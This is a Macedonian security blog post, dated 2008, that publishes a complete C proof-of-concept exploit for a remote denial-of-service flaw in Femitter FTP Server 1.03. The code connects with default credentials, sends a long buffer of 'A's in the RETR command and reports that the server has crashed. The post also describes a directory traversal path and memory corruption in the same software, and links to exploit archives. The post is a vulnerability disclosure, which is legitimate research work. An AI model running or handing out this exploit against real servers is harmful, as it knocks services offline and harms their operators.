IT.com.mk на Twitter IT.com.mk на Facebook IT.com.mk на Flickr IT.com.mk RSS канали
Почетна arrow Блог arrow Комп. сигурност arrow Femitter FTP Server 1.03 (RETR) Remote Denial of Service Exploit PoC
 
 
Компјутерска сигурност
Интернет, Дизајн и анимација, Сигурност, Мрежи, Оперативни системи
RSS Канал  
Е-пошта  
Биографија  
 
 
Ѓоко Крстиќ
 
Femitter FTP Server 1.03 (RETR) Remote Denial of Service Exploit PoC Испечати Е-пошта
Автор: Ѓоко Крстиќ   
Објавено на: 02.10.2008
Acritum Femitter HTTP/FTP Server (http://acritum.com/fem/index.htm) е ранлив на DoS напад со кој се оневозможува пристап до серверот односно доаѓа до "падање" на серверот со успешна експлоатација.

Ја најдов слабоста одамна и експлоитот е веќе јавно достапен но еве зошто да го нема и тука. :)

Да не должам многу, се работи за ранлива команда RETR која служи за испраќање на податоци од страна на серверот. Доколку испратиме премногу аргументи на командата доаѓа до DoS напад. Исто така зборуваме за повеќе слабости кај овој софтвер како корупција на меморија, Directory Traversal и сл. Следува доказ на концептот:

-----------------------------------------C код-----------------------------------------

/*0-----------------------------------------------------------------------------------0*\
0 0
| |
| Femitter FTP Server 1.03 (RETR) Remote Denial of Service Exploit PoC |
| |
| Summary: Femitter Server is an easy-to use HTTP and FTP server application |
| for Windows which allows you to use your own computer for sharing gigabytes |
| of files with your friends and colleagues. |
| |
| Desc: Femitter HTTP/FTP 1.03 suffers from a denial of service vulnerability |
| and memory corruption that causes the application to crash. When we send to |
| the RETR command an argument like AAAA:AAAA or an overly long string of As |
| (1024), the server crashes instantly. Also, when typing into browser: |
| ftp://127.0.0.1/\.. we traverse to the install folder of the program(CWD), |
| and when browsing to ftp://127.0.0.1/\..\/\..\ we get access violation at |
| address 004A218A in module "fem.exe". Write of address 00000000. |
| |
| Producst web page: http://acritum.com/fem/index.htm |
| |
| Tested on Microsoft Windows XP SP2 (English) |
| |
| Vulnerability discovered by Gjoko 'LiquidWorm' Krstic |
| |
| liquidworm [t00t] gmail.com |
| |
| http://www.zeroscience.org/ |
| |
| 17.09.2008 |
| |
0 0
\*0-----------------------------------------------------------------------------------0*/


#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <errno.h>
#include <netdb.h>


#define MANA "\x52\x45\x54\x52\x20\x41\x41\x41\x41\x3A\x41\x41\x41\x41\xD\xA"


void header(void);


int main (int argc, char *argv[])
{


int sckt = 0, sfd = 0;
char user[] = "USER admin\r\n";
char pass[] = "PASS nimda\r\n";

unsigned char payload[]=

"\x52\x45\x54\x52\x20\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
"\x41\x41\x41\xD\xA";

header();

if(argc != 3)
{
printf("\nUsage: %s [ip] [port]\n\n", argv[0]);
return (EXIT_SUCCESS);
}

struct sockaddr_in dos_ftp;
sfd = socket(AF_INET, SOCK_STREAM, 0);
if(sfd < 0)
{
perror("Socket");
printf("Error creating socket...\n");
return(1);
}

printf("\n\n[+] Socket created!\n");
sleep (1);

memset(&dos_ftp, 0x0, sizeof(dos_ftp));
dos_ftp.sin_family = AF_INET;
dos_ftp.sin_addr.s_addr = inet_addr(argv[1]);
dos_ftp.sin_port = htons(atoi(argv[2]));
sckt = connect(sfd, (struct sockaddr *) &dos_ftp, sizeof(dos_ftp));
if(sckt < 0)
{
perror("Connect");
printf("Error connecting...\n");
return(1);
}

printf("[+] Connection established!\n");
sleep (1);

write(sfd, user, strlen(user)); // username
printf("[+] Sending CMD: %s\n", user);
sleep (2);

write(sfd, pass, strlen(pass)); // password
printf("[+] Sending CMD: %s\n", pass);
sleep (2);

printf("[+] Sending malicious buffer to %s on port %s ...\n", argv[1], argv[2]);
sleep(2);

send(sfd, payload, sizeof(payload), 0); // send(sfd, MANA, sizeof(MANA),0);
printf("[+] Malicious buffer succesfully sent...\n");
sleep (1);
printf("[+] Femitter FTP Server v1.03 on %s has crashed!\n\n", argv[1]);

close (sfd);

return(0);
}

void header()
{

printf("\n**********************************************************************\n\n");
printf("\tFemitter FTP Server 1.03 (RETR) Remote Denial of Service Exploit PoC\n");
printf("\t\t\tby LiquidWorm \n\n");
printf("**********************************************************************\n\n");
}

-----------------------------------------C код-----------------------------------------

Femitter FTP Server 1.03 (RETR) Remote Denial of Service Exploit PoC

Експлоатација на Femitter FTP Server



Референти:
- http://www.milw0rm.com/exploits/6481
- http://www.securityfocus.com/bid/31226
- http://www.securitylab.ru/poc/extra/359669.php
- http://www.sebug.net/exploit/4658/
- http://www.packetstormsecurity.org/filedesc/fermitter-dos.txt.html
- http://www.emagined.com/security_exploits_article.php?target=6481.html
- http://forum.blackhack.ru/showthread.php?t=2650
- http://www.astalavista.com/index.php?section=exploits&cmd=details&id=6583
- http://securityreason.com/exploitalert/4715
- http://www.zeroscience.org/codes/femitter-dos.c


Клучни зборови:  Femitter FTP Server   DoS   Експлоит   Exploit   PoC   RETR   Слабост   Directory Traversal

 
Сподели:
Кајмакот
Digg
Technorati
Stumble
Reddit
YahooMyWeb
Delicious
Ma.gnolia
Facebook
Spurl
IT.com.mk форум

Првиот сајт

Првиот веб сајт е создаден со HTML код на 6 Август, 1991 од страна на Тим Бернерс-Ли. На сајтот биле објавени информации за тоа што е WWW и како се користи. Сајтот изгледал нешто слично на ова.
Нема настани во наредните денови.
Корисничко име

Лозинка



RSS канали на it.com.mk

Прашалник

Дали интернетoт е основно човеково право?

(127 глас/а)

  • 76.4%
  • 7.1%
  • 5.5%
  • 11%

Низ it.com.mk Блог Сервиси Маркетинг
Вести
Статии
Форум
Рецензии
Совети & трикови
Преземања
Настани
Барометар
Едуцентар
Препорачуваме
Сите блогови
е-Бизнис 2.0
Uid=0
Хардверманија
Компјутерска сигурност
Apple
Линукс блог
Веб-Соц Свет
Членство
Е-билтен
RSS канали
PDA верзија

Профили
Facebook профилTwitter профилIT.com.mk @ Flickr
IT.com.mk @ YouTubeLinkedIn профилFriendFeed профил
Каква музика слушаат ИТ луѓето?Препорачуваме линкови преку Delicious Главен RSS канал
Заработете со Whost.mk
Поставете линк или банер до whost.mk и заработете од секоја продажба..
http://www.whost.mk/affiliates.aspx

Aironet.mk - Безжичен Интернет
Едноставно и квалитетно решение...

Zero Science Lab
Македоснска лабораторија за истражување и развој на информациска безбедност